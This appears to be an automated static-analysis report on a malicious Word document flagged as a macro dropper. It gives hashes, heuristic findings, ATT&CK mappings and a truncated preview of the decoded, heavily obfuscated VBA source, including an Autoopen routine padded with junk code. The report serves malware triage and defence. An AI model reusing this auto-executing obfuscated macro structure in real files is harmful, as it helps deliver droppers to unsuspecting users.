Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d84138775153fb6f…

MALICIOUS

Office (OLE)

160.0 KB Created: 2018-04-26 19:40:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 594ce0bd893139cfa9ab930183f12a4f SHA-1: 11374e050ff717f938b609d9587830805ac0b141 SHA-256: d84138775153fb6fdab1dc5c8370f037475e926d87a4a57b7041c92a168f843a
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and a Shell() call. ClamAV identifies it as 'Doc.Dropper.Agent-6520158-0', suggesting it acts as a dropper. The VBA code is heavily obfuscated, but the presence of the Shell() call indicates an intent to execute external code, likely a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6520158-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520158-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52132 bytes
SHA-256: 17a24c0d3297022b89664ca1f41879e192b048d56e4cbec10d51eb4508ea7f44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sWLpKFSYwjVtsG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MINns(lNZQjH)
Select Case VQZNNu
         Case 84311
            fEGTd = wUzhZ
            kzwEl = Round(6960)
            kfSpj = Hex(pTdwkz - ChrW(wthEH))
            OSmtZ = GkGXTU
         Case 54055
            sHfMO = CByte(44016)
            otVYP = Log(WarQrz)
End Select
End Sub
Sub oiwmt(dKjvJ)
Select Case HmJpNV
         Case 81377
            vaYRUJ = jKOHcX
            VKJtT = Round(13180)
            OEzLzH = Hex(NkivBN - ChrW(OJjRj))
            tAVoh = wRzjU
         Case 3704
            qhVbFX = CByte(3835)
            WZkMbJ = Log(GAcbjw)
End Select
Select Case OjJit
         Case 21678
            NEKtRX = siathK
            alcGu = Round(12940)
            zDsRm = Hex(TmRbiq - ChrW(IUaSJ))
            BORBhC = cnwhYw
         Case 8745
            OARbf = CByte(63440)
            FRzPq = Log(OGLJwI)
End Select
Select Case wiBLP
         Case 99984
            jokCj = zuUIrd
            jIzCS = Round(23527)
            OjnXbp = Hex(YfwGMf - ChrW(oRhwj))
            tTlCS = DXoiz
         Case 86120
            EwzBM = CByte(52283)
            mYOVCf = Log(lsqSFj)
End Select
End Sub
Sub BuvkF(mbkzz)
Select Case JaUpP
         Case 40458
            sRVFQ = nURfzQ
            JvDEEQ = Round(12922)
            EKnRW = Hex(VXQCbz - ChrW(qqjpik))
            nUvnh = DOXQl
         Case 98210
            CoHhn = CByte(88973)
            RwBdW = Log(KSFXO)
End Select
Select Case joijO
         Case 1016
            RlHAzR = ijCjzB
            ZBrSSR = Round(27464)
            lJACLS = Hex(YEsjDc - ChrW(JvBLu))
            iQVYMp = mnRvj
         Case 41950
            AwAzF = CByte(17588)
            IwqSw = Log(zrvRH)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iPUnb
         Case 80672
            Mnknw = hFZKvE
            lbVSf = Round(10963)
            hGvsz = Hex(MrHfLY - ChrW(iwVXK))
            UQCajA = AmDuC
         Case 15498
            boFss = CByte(75764)
            lqzuz = Log(zXoFz)
End Select
oUlwzfh (kkwfj + IMuivVnnFOB + rmoao)
Select Case dDCfu
         Case 82452
            fXnjZE = hiPdzz
            uXldJZ = Round(57686)
            ASLCk = Hex(wTRdz - ChrW(SjzAYb))
            jNWLcq = ifRCl
         Case 32898
            iXUYXT = CByte(30051)
            KwAAVi = Log(akEhZ)
End Select
End Sub
Sub ndHiLU(QCOrjc)
Select Case MccAHk
         Case 90787
            YLcUm = FjzDr
            qtMqL = Round(98599)
            VIjIUt = Hex(wzIDZp - ChrW(lFwGr))
            KKWRop = zTQmpI
         Case 5434
            uoCHav = CByte(48022)
            YtdBA = Log(nPjUR)
End Select
Select Case KlSTi
         Case 37078
            ihWORn = qRtwQm
            CzXKna = Round(85292)
            ACUrjP = Hex(VjdHD - ChrW(aCiMOX))
            WWkEi = HovIrt
         Case 375
            hTtaGM = CByte(65453)
            KVIirc = Log(swZCdI)
End Select
Select Case SQMwIU
         Case 50447
            lODutj = lHLjbL
            vvsis = Round(5257)
            RqWrD = Hex(dNKEN - ChrW(kjtfz))
            MHMRqz = SDVQDd
         Case 54537
            QUXjD = CByte(80358)
            HYzHTG = Log(iBQuvf)
End Select
End Sub
Sub zzzZJk(HwGalz)
Select Case PWzut
         Case 57910
            oUjdbr = UAIhw
            TUYHtF = Round(72228)
            bqjiI = Hex(PfRAB - ChrW(vIfPv))
            sYnwzs = VAuzrA
         Case 77938
            zMdDvS = CByte(70754)
            ojIjv = Log(KpILKM)
End Select
End Sub

Attribute VB_Name = "MfsntmFVh"
Sub zNIvw(MzQIP)
Select Case MpMtoq
         Case 8894
            jqcfnj = QBjinH
            ITmkO = Round(77957)
            LuEwNT = Hex(aAwPQ - ChrW(tJkdIP))
            vzkdb = ChtGDc
         Case 
... (truncated)